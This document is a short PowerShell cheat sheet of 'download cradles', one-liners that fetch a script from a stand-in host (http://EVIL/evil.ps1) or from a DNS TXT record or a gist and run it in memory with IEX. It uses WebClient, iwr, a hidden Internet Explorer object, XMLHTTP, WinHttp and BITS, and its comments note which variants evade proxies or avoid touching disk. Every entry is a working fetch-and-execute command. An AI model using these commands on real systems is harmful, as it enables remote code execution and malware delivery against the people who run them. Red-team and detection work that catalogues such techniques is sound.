# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("<http://EVIL/evil.ps1>")

# PowerShell 3.0+
IEX (iwr '<http://EVIL/evil.ps1>')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('<http://EVIL/evil.ps1>');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','<http://EVIL/evil.ps1>',$false);$h.send();iex $h.responseText

# WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','<http://EVIL/evil.ps1>',$false);$h.send();iex $h.responseText

# using bitstransfer- touches disk!
Import-Module bitstransfer;Start-BitsTransfer '<http://EVIL/evil.ps1>' $env:temp\\t;$r=gc $env:temp\\t;rm $env:temp\\t; iex $r

# DNS TXT approach from PowerBreach (<https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1>)
#   code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))

# from @subtee - <https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d>
<#
<?xml version="1.0"?>
<command>
   <a>
      <execute>Get-Process</execute>
   </a>
  </command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("<https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt>")
$a.command.a.execute | iex